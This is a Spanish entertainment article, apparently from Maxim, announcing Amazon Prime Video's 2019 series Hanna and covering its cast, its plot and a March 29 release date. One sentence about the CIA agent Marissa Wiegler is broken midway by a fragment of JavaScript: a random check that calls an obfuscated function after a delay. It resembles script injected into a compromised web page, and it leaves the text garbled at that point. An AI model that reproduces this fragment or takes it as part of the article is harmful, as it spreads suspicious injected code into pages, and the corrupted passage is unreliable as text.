Hanna es la prometedora serie de acción de Amazon Prime Video

    Hanna es la prometedora serie de acción de Amazon Prime Video

    La serie que protagoniza Esmé Creed-Miles estará disponible para los ususarios de Prime Video a partir del próximo 29 de marzo.

    Autor: Redacción Maxim 26 febrero, 2019


     

    Amazon Prime Video prepara el lanzamiento de Hanna, una serie que te mantendrá al filo de tu asiento

     

    La plataforma de streaming de Amazon está por arrojar toda la carne al asador en este 2019 y Hanna es sólo el principio. La nueva serie Prime original está basada en la cinta homónima de 2011, que protagonizó por Saoirse Ronan.

     

    La serie será protagonizada por Esmé Creed-Miles, quien le dará vida a Hanna, una chica de 15 años criada en total aislamiento en los bosques remotos de Europa del Este, donde entrena para defenderse de los que intentan cazarla a ella y a su padre Erik Heller (Joel Kinnaman).

     

    via GIPHY

     

    Todo se complica cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando Marissa Wiegler (Mireille Enos), una agente de la CIA, descubre a Hanna, ésta se ve forzada a separarse de su padre y probar sus habilidades de supervivencia.

     

     

     

     

    Esta producción de NBCUniversal International Studios, Working Title Television y Amazon Studios fue escrita por David Farr (The Night Manager), quien también coescribió el largometraje original. La primera temporada de Hanna constará de ocho episodios, en el que acompañaremos a Hanna por un vertiginoso viaje que tendrá que hacer a través de Europa para reunirse con su padre, mientras evaden a los peligrosos agentes que los atacan.

     

     

     

    Marissa Wiegler (Mireille Enos).

     

     

     

    La narrativa de la serie transita entre las escenas de acción y la intriga de la conspiración. Hanna nos mostrará la historia de una mujer joven que tendrá que enfrentarse por primera vez el mundo moderno, con su fuerza como única aliada. Los ocho episodios de la primera temporada estarán disponibles para los usuarios mexicanos de Prime Video a partir del próximo 29 de marzo.

     

     

     

     

     

     

     

    ¡Habrá que verla!

     

    via GIPHY

     

     

La serie que protagoniza Esmé Creed-Miles estará disponible para los ususarios de Prime Video a partir del próximo 29 de marzo.